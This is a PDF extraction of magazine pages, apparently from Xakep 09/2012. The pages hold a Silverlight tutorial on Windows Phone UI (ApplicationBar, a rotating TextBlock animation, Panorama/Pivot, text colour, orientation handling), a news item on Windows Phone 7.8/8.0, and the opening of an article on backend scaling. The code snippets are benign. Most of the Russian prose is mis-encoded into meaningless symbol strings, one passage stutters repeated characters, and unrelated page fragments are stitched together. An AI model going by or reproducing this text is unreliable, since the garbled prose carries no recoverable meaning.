!"#"$%" &"'( )*) +",&- ./0 ")"%%10 +2-3"40%-5 (%0.*4%", )*)"6 "+02*7-"%%"6 /-/&0'1 — Windows, Linux -3- Mac OS) -'08& /&2")( '0%8 -/-3- &(3$*2, +2"92*''* #35 WP . +"#*.358:0' $"3;<-%/&.0 /3(,*0. &"40 '"40& -'0&; &*)"6 =30'0%& (+2*.30%-5. >#%*)" / (,0&"' ?0&2"-/&-35, )"9#* +2-3"40%-5 @*%-'*8& .0/; =)2*%, .1935#-& =&"& =30'0%& -%*,0 — "% 2*/+"3*9*0&/5 .%-@(. !20#/&*.30% "% )3*//"' ApplicationBar; "$A0)& =&"9" )3*//* '"40& /"#024*&; )%"+)- — =)@0'+3521 )3*//* ApplicationBarIconButton - &0)/&".10 +(%)&1 '0%8 — "$A0)&1 )3*//* MenuItems. B%"+)- '"9(& -'0&; )*2&-%)- 2*@'02"' 48 C 48 +-)/0306; ,&"$1 &0$0 %0 +2-<3"/; 2-/".*&; /*'"'(, Microsoft +2-9"&".-3* "$<-2%(8 )"330)7-8 (%*C"#-&/5 "%* . +*+)0 c:\Program Files (x86)\Microsoft SDKs\Windows Phone\v7.1\Icons\). >$2*&- .%-'*%-0, %*#" -/+"3;-@".*&; -@"$2*40%-5 -@ +"#)*&*3"9* dark. !020# &0' )*) @*8@*&; . +2-3"40%--, -C %*#" #"$*.-&; . 20<0%-0.

D30#(8:-' #06/&.-0' #*.*6 /"@#*#-' +2-3"40%-0, )"&"2"0 )2"'0 bar’a $(#0& -'0&; *%-'*7-"%%16 =30'0%&. E*)-' "$2*@"', .'0/&0 / =30'0%&*'- (+2*.30%-5 '1 2*//'"&2-' ."@'"4%"/&- Silverlight . /"@#*%-- *%-'*7--.

F&"$1 #"$*.-&; +(/&"6 $*2, #"/&*&",%" . XAML-G*630 .%(&2- &09* <phone:PhoneApplicationPage> %*+-/*&;:

<phone:PhoneApplicationPage.ApplicationBar> <shell:ApplicationBar IsVisible="True" IsMenuEnabled="True"> <!-- ȞȢȘ Șȟȳ ȘȢȕȔȖȟșȡȜȳ ȱȟșȠșȡȦȢȖ--> </shell:ApplicationBar></phone:PhoneApplicationPage.ApplicationBar>

H&2-$(& isVisible "&.0,*0& @* .-#-'"/&; $*2*, isMenuEnabled —

@* 09" *)&-.%"/&;. I"$*.-' #.0 )%"+)-, %*4*&-0 %* +02.(8 -@ )"-&"21C $(#0& @*+(/)*&; *%-'*7-8, * %*4*&-0 %* .&"2(8 — "/&*%*.-3-.*&;. I35 #"$*.30%-5 )%"+") %*+-<- &*)"6 )"#:

<shell:ApplicationBarIconButton x:Name="butStart" Text="Start" IconUri="/icons/appbar.transport.play.rest. png" Click="butStart_Click"/><shell:ApplicationBarIconButton x:Name="butPause" Text="Pause" IconUri="/icons/appbar.transport.pause. rest.png" Click="butPause_Click"/>

E0+02; "+-<0' "+20#030%%10 %*'- /"$1&-5 (#.0 <&()-) . .-#0 )"#* %* C#. !0206#- . G*63 MainPage.xaml.cs - %*+-<- #.* +")* +(/&1C "$2*$"&,-)* /"$1&-6:

private void butStart_Click(object sender, EventArgs e) { } private void butPause_Click(object sender, EventArgs e) { }

?"4%" $13" $1 "/&*.-&; -C "+-/*%-0 #" '"'0%&* 20*3-@*7--,

%" &"9#* +2"9* $1 %0 )"'+-3-2".*3*/;, * .0#; '1 .0#0' 2*@2*-$"&)( ,020@ &0/&-2".*%-0 (TDD) - +"=&"'( ./09#* #"34%1 -'0&; 2*$",-6 $-3#.

B/&*&-, $*2 %0 '"40& /"#024*&; $"3;<0 ,0&120C )%"+"), -%*,0 +2-3"40%-0 $(#0& +*#*&; +2- @*+(/)0.

E0+02; %*/&*3* +"2* /"@#*&; "$A0)&, )"&"21' $(#0' (+2*.35&;. !(/&; =&" $(#0& /3"." «J*)02» (.""$:0-&" '1 C"&03- -/+"3;@".*&; %*@.*%-0 ."#)-, )"G0 -3- C"&5 $1 "+02*&"2* /.5@-, %" .".20'5 ./+"'%-3-, ,&" K0)'*'$0&". — %0 %*< 93*.%16 20#*)&"2).

L&*), #35 /"@#*%-5 "$A0)&* . G*63 2*@'0&)- -%&02G06/* .%(&2; ",-:0%%"9" &09* Grid #"$*.; &*)"6 )"#:

<TextBlock HorizontalAlignment="Center" Margin="125,298,133,306" Name="HackText" Text="ǵȔȞșȤ" VerticalAlignment="Center" FontFamily="Arial" FontSize="80"></TextBlock>

K3*9"#*25 =&"'( )"#( %*#+-/; «J*)02» 2*@'0/&-&/5 +2-'02%"

. 70%&20 =)2*%*, %*+-/*%* "%* $(#0& <2-G&"' Arial $"3;<"9"-+20$"3;<"9" 2*@'02*. E0+02; ."/+"3;@(0'/5 G(%)7-"%*3;%"/&;8 $*2*, ,&"$1 #"$*.-&; ) %0'( +(%)&1 &0)/&"."9" '0%8, )"&"2"0 +"5.350&/5 +"/30 %*4*&-5 )%"+)- / '%"9"&",-0', %*C"#5:06/5 / +2*."9" )2*5. I.(C .+"3%0 #"/&*&",%". >%- $(#(& /3(4-&; %*' #35 -@'0%0%-5 7.0&* <2-G&*.

B "+-/*%-8 &09* <phone:PhoneApplicationPage.ApplicationBar> +"/30 #"$*.30%-5 )%"+") #35 .)38,0%-5 +(%)&". '0%8 %*+-<- &*)"6 )"#:

!"#"$% 3. APP BAR

Silverlight, )2"'0 WP. M'0/&0 / &0' =&( )*&09"2-8 /"/&*.358& &"3;)" #.* "$A0)&*: Panorama - Pivot. >$* =&- "$A0)&* +"@."358& /"@#*&; "/"$0%%16, /"/&"5:-6 -@ %0/)"3;)-C /'0%58:-C #2(9 #2(9* +*-%0306 -%&02G06/. I35 +2-'02* /#03*0' +2"/&0%;)-6 -%&02G06/, / +"'":;8 )"&"2"9" '"4%" $13" $1 3-/&*&; =30)&2"%%(8 .02/-8 38$-'"9" 4(2%*3* :). F&"$1 -/+"3;@".*&; )"%&2"3 Panorama (-3- Pivot), %0"$C"#-'" . ")%0 «Add Reference» (Project Æ Add Reference) #"$*.-&; //13)( %* /$"2)( Microsoft.Phone.Controls (2-/. 1).

N*&0' . )"#0 %*#" +"#)38,-&; +2"/&2*%/&." -'0%:

xmlns:pan="clr-namespace:Microsoft.Phone. Controls;assembly=Microsoft.Phone.Controls".

O*)"%07, ,&"$1 #"$*.-&; +*%"2*'( . +2-3"40%-0, %*+-<- &*)"6 )"#:

<pan:Panorama Title="Xakep magazine"> <pan:PanoramaItem Header="1"> </pan:PanoramaItem> <pan:PanoramaItem Header="2">

</pan:PanoramaItem> <pan:PanoramaItem Header="3"> </pan:PanoramaItem></pan:Panorama>

M -&"90 &1 /'"40<; . .-2&(*3;%"' 4(2%*30 «J*)02» 3-/&*&; /&2*%-71 +2-.1,%1' /+"/"$"'. O*+"3%0%-0 /&2*%-7 %*#" #"$*.-35&; .%(&2; &09". PanoramaItem. I35 =)"%"'-- +2"/&2*%/&.* 5 %0 /&*3 +2-."#-&; )"# . 4(2%*30, &1 '"40<; +"/'"&20&; 09" . +2-'0-20 %* %*<0' #-/)0. D&2*%-71 '"4%" %*+"3%5&; 38$1'- "$A0)&*-'-, &" 0/&; )*4#*5 +*%03; '"40& -'0&; /."8 2*@'0&)( (2-/. 2).

M ,0' 2*@%-7* '04#( Pivot - Panorama? >$A0)& Pivot, . "&3-,-0 "& Panorama, %0 "$3*#*0& "$:-' #35 ./0C /&2*%-7 @*9"3".)"': 0/3- Panorama +"@."350& +020C"#-&; /" /&2*%-71 %* /&2*%-7( &"3;)" +"/30#".*&03;%" (/ &0)(:06 %* /30#(8:(8 -3- +20#1#(-:(8), &" / +"'":;8 Pivot '"4%" +0206&- %* 38$(8 /&2*%-7(, +2--)"/%(.<-/; ) 00 %*@.*%-8 . /+-/)0 ..02C( =)2*%* (2-/. 3).

!"+"3%-&; $-$3-"&0)( =30'0%&". (+2*.30%-5 '"4%", %*+2--'02, /)*,*. - (/&*%".-. &(3)-&: silverlight.codeplex.com/releases/view/52297. B/&*&-, +2- -@9"&".30%-- /='+3". #35 /&*&;- '1 +"3;@".*3-/; =&-' &(3)-&"'.

!"#$%&

'(!)* 09 /164/ 2012102

!"#. 4. $#% &'()*'%*!

!"#$%&## ' Silverlight (%)%*+,- ' ./)0, /"# 120),+%'3-*+ ,/4/5 #($0"0"#0 ,'/5,+' /460.+/' , +070"#0$ '20$0"#. 89 :0 (;/+- "0+, 1/70$< =+/ $9? >+/ :0 -!) ;/+#$, 7+/49 '/ '20$- %"#$%&## "%)1#,? '2%@%3%,? "% 360 A2%)<,/' 1/ /,# Y. B,3# '(A3-"<+? "% ,'/5,+'% =.(0$13-2% .3%,,% TextBlock, +/ $9 "0 /4"%2<:#$ ,'/5,+' )3- (%)%"#- A2%)<,/' '2%@0"#- 1/ /120)030""/5 /,#. C0$ "0 $0"00, '/,1/3?(/'%'D#,? 12#,/0)#"-0$9$ ,'/5-,+'/$, $9 ,$/:0$ 20D#+? =+< (%)%7<. C%.#$ /42%(/$, ,'/5,+'< Projection .3%,,% TextBlock 4<)<+ 1020)%'%+?,- 1/))02:#'%0$90 #$ ("%70"#- .3%,,% PlaneProjection. E 1/$/@?* =+/A/ ,'/5,+'% . /460.+< .3%,,% TextBlock 4<)0+ )/4%'30"% '/($/:"/,+? '2%-@0"#-. F3- =+/A/ 1020) (%.29'%*@#$ +0A/$ </TextBlock> )/4%'?:

<TextBlock.Projection> <PlaneProjection x:Name="rotY"/></TextBlock.Projection>

G 20(<3?+%+0 4<)0+ )/4%'30"/ 12#,/0)#"-0$/0 ,'/5,+'/ 1/) #$0"0$ rotY, $%"#1<3#2<- ("%70"#0$ ./+/2/A/ $/:"/ '2%@%+? 2/)#+03?,.#5 /460.+ 1/ /,# Y. C0102? /1#D0$ ,/4,+'0""/ %"#-$%&#*. G"<+2? +0A% Grid )/4%'? ,30)<*@00 /1#,%"#0:

<Grid.Resources> <Storyboard x:Name="rotateY"> <DoubleAnimation Storyboard.TargetName="rotY" Storyboard.TargetProperty="RotationY" From="0" To="360" Duration="0:0:5" /> </Storyboard></Grid.Resources>

H)0,? ,/()%0+,- 2%,.%)2/'.% 1/) #$0"0$ rotateY, /"% ,,93%-0+,- "% ,/()%""/0 "%$# ,'/5,+'/ rotY, #( ./+/2/A/ )3- #($0"0-"#- 4020+,- 1%2%$0+2 RotationY (1/,30)"#5 -'3-0+,- )/702"#$ 1%2%$0+2/$ ,'/5,+'% Projection). H%+0$ $9 <.%(9'%0$, ' .%.#; 120)03%; #($0"-+? ("%70"#0 '942%""/A/ 1%2%$0+2%, # 1/,30)-"#$ )05,+'#0$ (%)%0$ )3#+03?"/,+? %"#$%&##. I2/$0 +/A/, %"#$%&#- /46-'3-0+,- .%. 20,<2, =30$0"+% Grid.

E057%, '/,1/3?(<0$,- <:0 /46-'30""9$# /42%4/+7#.%$# ,/-49+#5 )3- (%1<,.% # /,+%"/'.# %"#$%&## ("%1/$"*, 7+/ $9 #; "%-1#,%3# ' J%530 MainPage.xaml.cs). G 102'/$ #( "#;, ,3<:%@0$ )3- (%1<,.%, "%1#D#: rotateY.Begin();, % '/ '+/2/$, ./+/295, ,//+'0+-,+'0""/, ,3<:#+ )3- /,+%"/'.#, "%1#D#: rotateY.Pause();. K2/+0,+#-2<5 12#3/:0"#0, ',0 )/3:"/ 2%4/+%+?, .%. # (%)<$%"/ (2#,. 4).

!"#"$% 4. &'()&#(*

<shell:ApplicationBar.MenuItems> <shell:ApplicationBarMenuItem x:Name="butWhite" Text="White" Click="butWhite_Click"/> <shell:ApplicationBarMenuItem x:Name="butGreen" Text="Green" Click="butGreen_Click"/></shell:ApplicationBar.MenuItems>

K020) +0$ .%. /1#,9'%+? /42%4/+7#.# "%:%+#5 1<".+/' $0"*, "0/4;/)#$/ /46-'#+? 12#,/0)#"0""/0 ,'/5,+'/ — =+/ 1/('/3#+ #,1/3?(/'%+? ,'/5,+'%, ./+/290 "0 /46-'30"9 ' +0.<@0$ .3%,,0. C%.#$ /42%(/$ (,$. 3#,+#"A )%300), ;/+- ,'/5,+'/ Foreground .3%,,% TextBlock "0 1/))02:#'%0+ ("%70"#5 .3%,,% Colors, /" #,1/3?(<0+ 12#,/0)#"-0$/0 ,'/5,+'/, "%('%""/0 "%$# TextColor, )3- 20%3#-(%&## .3%,,% SolidColorBrushes. I/+/295, ' ,'/* /7020)?, 1/))02-:#'%0+ ("%70"#- .3%,,% Colors, 1020)%'%- ./220.+"90 ("%70"#- "%('%"#5 120)/120)030""9; &'0+/'.G $0,+0 /1#,%"#- =.(0$13-2% .3%,,% TextBlock ('"<+2# /)"/#$0""/A/ +0A%) )/4%'? +%./5 ./):

<TextBlock.Foreground> <SolidColorBrush x:Name="TextColor" Color="White"/> </TextBlock.Foreground>

G #+/A0, .2/$0 +/A/ 7+/ (%)%3# ,'/5,+'/, $9 <,+%"/'#3# "%-

7%3?"95 &'0+ +0.,+% 4039$. F%300 $9 $/:0$ "%1#,%+? /42%4/+7#-.# "%:%+#- "% 1<".+9 $0"*:

private void butWhite_Click(object sender, EventArgs e) { this.TextColor.Color = Colors.White; }

private void butGreen_Click(object sender, EventArgs e) { this.TextColor.Color = Colors.Green; }

G 20(<3?+%+0 12# "%:%+## "% /120)030""95 1<".+ $0"* &'0+ D2#J+% 4<)0+ ,//+'0+,+'<*@#$ /42%(/$ #($0"-+?,-.

Face of Windows Phone

!"#$% 09 /164/ 2012 103

!"#. 5. $ %&"'()*+"', -&%./'0 1 (*# (')

!"#$ "%&'(" () "*+"#%, ), )-%*. -(/,0+ 1(2%& 3-,4-(**+) 1(-5#,1$06 0%#%7,1, 0, "#,), «8(5%-» 1% $9*%1$0 "),%4, 3,#,:%1$.. ;%3,-.<,5! =,/$#61+% 3-$#,:%1$. <,#:1+ 5-("$), -%(4$-,)(06 1( <(11+%, 3,"0>3(?@$% " (5"%#%-,*%0-(, $ <#. A0,4, Silverlight for WP 3-%<,"0()#.%0 1(* )"% >"#,)$..

B%-)+* <%#,* ) 1('(#% 7(&#( MainPage.xaml ) ,3-%<%#%1$$ 0%4( <phone:PhoneApplicationPage> ,0-%<(50$->& ,3-%<%#%1$% (0-$/>0( SupportedOrientations 1( 0(5,%: SupportedOrientations=”PortraitOrLandscape” Orientation=”Portrait”. C0, ,91('(%0 3,<-<%-:5> 1(2$* 3-$#,:%1$%* ,/%$D ,-$%10(E$&. F 5('%"0)% <%7,#01,& *+ >5(9(#$ 3,-0-%01>? ,-$%10(E$?. !"#$ "%&'(" ), )-%*. 3-,)%-5$ ,3-,5$1>06 0%#%7,1, 0, 51,35$ 1( /(-% 3-$*>0 ",,0)%0"0)>?@%% 3,#,:%1$%, ( 1(<3$"6 $"'%91%0. G3-#.! ;(<, 3,3-()$06 "$0>(E$?. !"#$, "#%<>. *,%*> ",)%0>, 0+ ><(#$# )"% ",-<%-:$*,% 0%4( Grid, 0, )%-1$ ,3$"(1$% "#%<>?@%4, (0-$/>0(:

<Grid.RowDefi nitions> <RowDefi nition Height="Auto"/> <RowDefi nition Height="*"/> </Grid.RowDefi nitions>

!"#"$% 5. $!&'()*+&, -!("+%&#(,F 1%* ,3-%<%#.%0". ",<%-:$*,% "%05$, ) <(11,* "#>'(% ,1,

","0,$0 $9 ,<1,& "0-,5$. H(0%*, 1$:% "0-,'5$ ,3-%<%#%1$. ,-$%10(E$$ 3-$#,:%1$., 9(-%4$"0-$->& %4, 1( 3,#>'%1$% $9)%-@%1$. , "*%1% 3,#,:%1$. 0%#%7,1(: OrientationChanged=”Phone_OrientationChanged”. ;(3$2%* ,/-(/,0'$5 A0,4, ",/+0$. ) 5,<% 1( C#:

private void Phone_OrientationChanged(object sender, OrientationChangedEventArgs e){ if ((e.Orientation & PageOrientation.Landscape) == (PageOrientation.Landscape)) { Grid.SetRow(HackText, 0); Grid.SetColumn(HackText, 1); } else { Grid.SetRow(HackText, 1); Grid.SetColumn(HackText, 0); }}

F,0 0%3%-6 )"% -(/,0(%0! F 9()$"$*,"0$ ,0 $9*%1%1$. 3,#,-:%1$. 0%#%7,1( "%05( 3-$1$*(%0 0%3%-6 )$< "0-,5$ $#$ "0,#/E( ",,0)%0"0)%11, (-$". 5).

GIJFKFGLK B,< 9(1()%" "0(06$ 3,<+0,:$*, '%4, *+ <,/$#$"6 $ '0, >91(#$. M(5 $ 3#(1$-,)(#$ )1('(#%, *+ >91(#$ ) 0%,-$$ $ 3,3-,/,)(-#$ 1( 3-(50$5% 1%5,0,-,% 5,#$'%"0), <$9(&1%-"5$-5,<%-"5$D 0-?5,) <#. 3#(07,-*+ WP, -(""*,0-%) -(91+% <%5,-(0$)1+% ,/N%50+ $ A#%*%10+ >3-()#%1$.. M-,*% 0,4,, *+ 3,4->9$#$"6 ) .9+5 XAML, >91(#$ ,/ $"3,#69,)(1$$ 3-,"0+D (1$*(E$&, ( " 3,*,@6? 3-$",%<$1.%*+D "),&"0) *+ 1(>'$#$"6 ,-4(1$9,)+)(06 3%-%<('> ,/N%50> 0(5$D 91('%1$&, 5,0,-+% $91('(#61, $* 1% 3,<<%-:$)(?0".. L, )"0-%'$ 1( "0-(1$E(D :>-1(#( $ ><('$ 0%/% ), )"%D <%#(D! z

!"#$ %&'$($') *+$ '+$+),, -$ #"-./0/-1&& Windows Phone Summit Microsoft %0/2'+$3&($ 23/ 4"5&()-67 89 — Windows Phone 7.8 & 8.0. !/03$, — *+" 4$':+$5-"/ "5-"3(/-&/ 2(, ';</'+3;=<&7 ;'+0">'+3 -$ 5$?/ Windows Phone 7.5, +"@2$ #$# 3+"0$, — %"(-"1/--$, 89, 2(, 0$5"+6 ' #"+"0"> %"-$2"5&+', -"3"/, 5"(// 4"<-"/ ;'+0">'+3". A($3-"> .&:#"> "5-"3(/-&, '+$-/+ 0$':&0/--6> %" .;-#1&"-$()-"'+& & 5"(// ;2"5-6> 3 &'%"()?"3$-&& '+$0+"36> *#0$-. B$%0&4/0, 3 -/4 %",3&($') 3"?4"C-"'+) &?4/-,+) 0$?4/06 %(&+"#. D/("E), $ %0&,+-"! D/-,, -$%0&4/0, 0$?20$C$/+, E+" -$ 4"/4 +/(/."-/ %(&+#$ #$(/-2$0, &4//+ 5"():&> 0$?4/0, E/4 %(&+#$ &@06 RollingCar :).

9 20;@"> '+"0"-6, 3 WP 8.0 "5F,3(/-" " %",3(/-&& "@0"4-"@" #"(&E/'+3$ -"3"33/2/-&>, & 3"+ -/#"+"06/ &? -&7. G"-%/0367, *+"

"5<// ' 2/'#+"%-"> 3/0'&/> NT ,20", E+" %0/23/<$/+ -$4 5"(// (/@#&> %/0/-"' %0&("C/-&>. G"-3+"067, *+" 3"?4"C-"'+) %0"@0$44&0"3$+) 3 -$+&3-"4 #"2/ -$ C/C++ & %"(-"1/--$, %"22/0C#$ DirectX, E+" "+#0"/+ -"36/ @"0&?"-+6 %/0/2 0$?0$5"+E&#$4& &@0. G-+0/+)&7, *+" %"22/0C#$ 20;@&7 .0/>43"0#"3 (+$#&7, #$# PhysX, Havok) &, 5;2/4 -$2/,+)',, -$#"-/1 -$'+",<$, 4-"@"?$2$E-"'+). H? 20;@&7 ($%%$0$+-67) -"3:/'+3 '+"&+ "+4/+&+): ;3/(&E/--6> 2" 1280 D 768 *#0$-, %"22/0C#; 5"(// E/+60/7 ,2/0, %"22/0C#; SD #$0+ %$4,+&, -$(&E&/ '3,?& -$ 5(&?#"4 0$''+",-&& — NFC.

G67"2 "5/&7 "%/0$1&"-"# "C&2$/+', 3 '/0/2&-/ "'/-&, 34/'+/ ' 2/'#+"%-"> «G"')4/0#">». !0,4" #" 2-= 0"C2/-&, I&(($ — 28 "#+,50, :).

WINDOWS PHONE 7.8 2 8.0

.-/()*+0" $!()-1"+(, 2-)1+0 3!&4('- !"&5(!-'&%* +& 2&++0", $-4%6$&78(" 4 &34")"!-."%!&. ( 9%- !"&)(:6".-

!"#$% 08 /163/ 2012

!"#$%& '()*("++,-. /)01. -.".2 3405,+, ')340".2 6-1 7)311 ,8.1(1-8%1 , -3)#8%1 9"$"0, , (15".2 ,/ 6-1 7)311 :;;1<.,68%+, -')-)7"+,. = +,(1 ,8.1(81.-("9("7).)< < ."<,+ 9"$"0"+ +)#8) ).81-., .1, - <).)(%+, -."3<,6">.-? ("9("7).0,<, 6%-)<)8"*(4#188%/ -,-.1+.

@)325"? 0"-.2 ,8;)(+"A,,, )'473,<)6"88"? ') .1+1 6%-)<,/ 8"*(49)< 6 ,8.1(81.1, '(1$-."63?1. -)7)& 6-1*) 3,52 )',-"8,? .1/8,01-<,/ /"("<.1(,-.,< <(4'8%/ -,-.1+. B% #1 ')'()741+ ,93)#,.2 '(,8A,'%, ') <).)(%+ -.()?.-? "(/,.1<.4(% -"+%/ '1(1$)6%/ , -"+%/ ')-1C"1+%/ ,8.1(81.-'()1<.)6 8"51*) 6(1+18,.

2 3 4 5 6

!"#$% 09 /164/ 2012

"#"&$'()

!!!!!!!!!"! #$ &&&&&&&%&&& '()')340".2 6-9"9"9"9"9"9"9"99"99"$"$"$"$"$"$"$"$$"$"$"0,0,0,0,0,0,0,0,0,00 ,,,,,,,,,,, ((((((((((111111111-'-- ))-)) )7"+,.< <<<<<<<< ."."."."."."."."."."<,<,<,<,<,<<<,<,< ++++++++ 9"9"9"9"99"$$$$$$$$- <).)(%+,6%-)<)8"*(((((((

@)325"? 0")')')')'474747477773,3,,3,,3,<)<)<)<)<)6"6"66"66 ,88.1(81.13,3,3,3,3,3,3,3,3,3,3,525252525252525525252 ))))))))))',',',',',',',',',' -"-"-"-"--"-"-"<(4'8%/ -,-'('('('((,8,8,88,8,, A,A,A,A,A,A,,'%'%'%'%'%'%'%'%'%, , ,,,,, '''-"+%/ '1(1,8.1(8(8(( 1.-'

2

"#"&$'()

!"#$%&' () *+,)'&- %./0!1'.-

104

!"#$ # 1

!"#$% 08 /163/ 2012

!"#$%& $"' ()%(*+ ,)-., /-0123%$$4+ 5*6$%0-7-8*.% /)-%.(". 9(- 0"&"2 87"1$"2 0-0("172:3"2 1 -5)"5-(.% 7:5-8- 6"/)-0". ;72 (".*< 14#*07%$*+ ()%5,:(02 5=.%$>4 — (2?%74% 0%)1%)4 0 5-7@'*&* 14#*07*(%7@$4&* &-3$-0(2&*. A07* B)-$(%$> $% &-?%( -(>"(@ .7*%$(, #(--(- 0"&-0(-2(%7@$- (" .". &4 1420$*7* 1 /)-'7-& $-&%)%, -$ 5%6 /)-57%& &-?%& 0"& -(>"(@, . /)*-&%),, .")(*$.*), (- -$ /%)%>"%( 6"/)-0 >"7@'% /- C%/-#.% — $" 5=.%$>. !" 5=.%$>% -()"5"(41"%(02 5*6$%0-7-8*.", (- %0(@ B-)-&*),:(02 * -5)"5"(41":(02 >"$$4%, /)* =(-& >"$$4% <)"$2(02 1 >),8-& 07-% — 0%(%1-& <)"$*7*3%, 5"6% >"$$4< *7* B"+7-1-+ 0*0(%&%. D)"$%$*% >"$$4< — =(- (%&" 07%>,:3%8- ,)-.", " 0%-8->$2 &4 0-0)%>-(-#*&02 $" &"0'("5*)-1"$** 5=.%$>".

E)"6, /)%>,/)%>*&: &"0'("5*)-1"$*% 14#*072:3*< 5=.%$->-1 — ->$" *6 0"&4< 07-?$4< (%&, 1 .-(-)-+ 0,3%0(1,%( &$-?%-0(1- &*B-1. F57"#$4% 14#*07%$*2 )%'":( /)-57%&, /)-*61-->*(%7@$-0(* — ,1%)%$4 &$-8*%. F>$".- =(- 1%)$- $% >- .-$C": >72 (-8- #(-54 1"& >%+0(1*(%7@$- &-87* /-&-#@ -57"#$4% 0%)-1*04, 14 >-7?$4 /)"1*7@$- /->8-(-1*(@ 1"' /)-8)"&&$4+ .->. G4 &-?%(% /->$2(@ 0.-7@.- ,8->$- 0%)1%)-1, 0."?%&, 1 Amazon EC2, $- .".-+ 0 $*< (-7., %07* .-> $% ,&%%( *0/-7@6-1"(@ &-3-$-0(* ."?>-8- *6 $*<. H("., .". &"0'("5*)-1"(@ 5=.%$>?

&'(#)*+(",-(+$ %"./$,$(*$E"&4+ /%)14+ * /)-0(-+ 0/-0-5, 0 .-(-)4& 0("7.*1":(02 10%, — =(- B,$.C*-$"7@$-% )"65*%$*%, /)* .-(-)-& )"6$4% #"0(* 0*0(%&4, ."?>"2 *6 .-(-)4< )%'"%( 0()-8- 01-: 6">"#,, )"6$-02(02 $" -(>%7@$4% B*6*#%0.*% 0%)1%)4. !"/)*&%), /-0%3"%&4+ B-),& 14$-0*(02 $" ->*$ 0%)1%), " 10% -0("7@$-% )"5-("%( $" >),8-&.

!%0&-()2 $" %8- /)-0(-(,, - /->-5$-& /-><->% &$-8*% 6"-541":(. !"/)*&%), &4 -#%$@ #"0(- 10()%#"%& 1%5-/)-%.(4, 8>% *0/-7@6,%(02 (-7@.- ->$" 5"6" MySQL /-> 0-1%)'%$$- )"67*#$4% (*/4 >"$$4<. G ->$-+ 5"6% 7%?"( * 0("(@*, * 5"$$%-)4, * 0("(*0(*.", <-(2 /--<-)-'%&, =(- >-7?$4 54(@ )"6$4% =.6%&/72)4 MySQL. A07* , 1"0 %0(@ B,$.C*-$"7@$- $% 0126"$-$4% >"$$4% (.". 1 =(-& /)*&%)%), (- *< C%7%0--5)"6$- )"6$-0*(@ 1 )"6$4% =.6%&/72)4 5"6 >"$$4< *7* >"?% B*6*#%0.*% 0%)1%)4. I-0&-()*& $" =(- 0 >),8-+ 0(-)-$4. A07* , 1"0 %0(@ 1 ->$-& /)--%.(% * 10()-%$$"2 *$(%8)*)-1"$$"2 5"$$%)-.),(*7.", * 0%)1*0, .-(-)4+ /-."641"%( /-0(4 /-7@6-1"(%7%+, (- )"6,&$-% )%'%-$*% — 0)"6, -0-6$"(@, #(- =(* >"$$4% $*.". $% 0126"$4 &%?>, 0-5-+ * /-=(-&, >-7?$4 ?*(@ 1 0"&-& /)-0(-& 1")*"$(% 1 >1,< )"6$4< 6"/,3%$$4< MySQL. 9(- -($-0*(02 * . 14#*072:3*& 5=-.%$>"& — -$* (-?% &-8,( 54(@ )"6$4&*. E 0-1%)'%$$- )"6$4&* $"0()-+."&*, 0 )"6$4&* *0/-7@6,%&4&* (%<$-7-8*2&* * $"-/*0"$$4% $" )"6$4< 264."< /)-8)"&&*)-1"$*2. G-61)"3"20@ . /)*&%),: >72 /-."6" /-0(-1 14 &-?%(% *0/-7@6-1"(@ 1 ."#%-0(1% 5=.%$>" 0"&4+ -54#$4+ PHP, " >72 5"$$%)$-+ 0*0(%&4 14 &-?%(% 6"/,0(*(@ &->,7@ . nginx’,. E--(1%(0(1%$$-, >72 /-0(-1 14 &-?%(% 14>%7*(@ 0%)1%) 0 5-7@'*& .-7*#%0(1-& /"&2(* ($,, PHP 10%-(".*), /)* =(-& >72 5"$$%)$-+ 0*0(%&4 /"&2(@ &-?%( 54(@ $% (". 1"?$", .". /)-C%00-)$"2 %&.-0(@.

E>%7"%& 141->4: B,$.-C*-$"7@$-% )"65*%$*% 5=.%$>" C%7%0--5)"6$- *0/-7@6-1"(@ 1 ."#%0(1% /)-0(%+'%8- &%(->" &"0'("5*)-1"$*2. J),//*),+(% 0<->$4% B,$.C** * 6"/,0."+(% *< -5)"5-(#*.* $" )"6$4< B*6*#%-0.*< 0%)1%)"<. F5)"(*&02 . 07%->,:3%&, /-><->,.

#,"00*1$0#+$ 2+%*.+(3",-(+$ 4"053"6*%+7"(*$F (-&, #(- (".-% 8-)*6-$("7@$-% &"0'("5*)-1"$*%, 1 /)*$C*/%, &4 ,?% 6$"%&. A07* 1"'%+ 0*0(%&% $% <1"("%( &-3$-0(*, 14 /)-0(- >-5"172%(% %3% >%02(@ 0%)1%)-1, * -$* /)->-7?":( )"5-("(@. !- $% ."?>4+ /)-%.( /-61-7*( /)--1%)$,(@ (".-%. A0(@ $%0.-7@.- .7"00*#%0.*< /")">*8&, .-(-)4% $%-5<->*&- )"00&-()%(@ $" )"$-$%& =("/% /)-%.(*)-1"$*2, #(-54 /)-8)"&&$4+ .-> &-?$- 547- &"0-'("5*)-1"(@ /)* )-0(% $"8),6.*.

#+()$8)** SHARED NOTHING * STATELESSK"00&-()*& >1% .-$C%/C** — Shared Nothing * Stateless, .-(-)4% &-8,( -5%0/%#*(@ 1-6&-?$-0(@ 8--)*6-$("7@$-8- &"0'("5*)-1"$*2.

I-><-> Shared Nothing -6$"#"%(, #(- ."?>4+ ,6%7 2172%(02 $%6"1*0*-&4&, 0"&->-0("(-#$4& * $%( .".-+-(- %>*$-+ (-#.* -(."6". 9(-, .-$%#$-, $% 10%8>" 1-6&-?$-, $- 1 7:5-& 07,#"% .-7*#%0(1- (".*< (-#%. $"<->*(02 /-> ?%0(.*& .-$()-7%& ")<*(%.(-)". I-> (-#.-+ -(."6" &4 /-$*&"%& $%.*% >"$$4% *7* 14#*0-7%$*2, .-(-)4% 2172:(02 -53*&* >72 10%< 5=.%$>-1. !"/)*&%), .".-+-$*5,>@ >*0/%(#%) 0-0(-2$*+ *7* *>%$(*B*."(-)-1. ;),8-+ /)*&%) — *0/-7@6-1"$*% 0%(%14< B"+7-14< 0*0(%&. 9(- /)2&-+ /,(@ /-7,#*(@ $" -/)%>%7%$$-& =("/% )-0(" /)-%.(" ,6.-% &%0(- 1 ")<*(%.(,)%. A07* ."?->4+ ,6%7 2172%(02 $%6"1*0*&4&, (- &4 7%8.- &-?%& >-5"1*(@ %3% $%0.-7@.- — /- )-0(, $"8),6.*.

L#%5$*. /- 140-.*& $"8),6."&. L)-. M 3

!"#$% 09 /164/ 2012 105

4"053"6*%+7"(*$ 69#$(/"

&:;<=>?;@AB;?C D@EFCAC;>C

#A@GG>HCG<?C I?D>E?;J@AB;?C K@GLJ@M>D?N@;>C

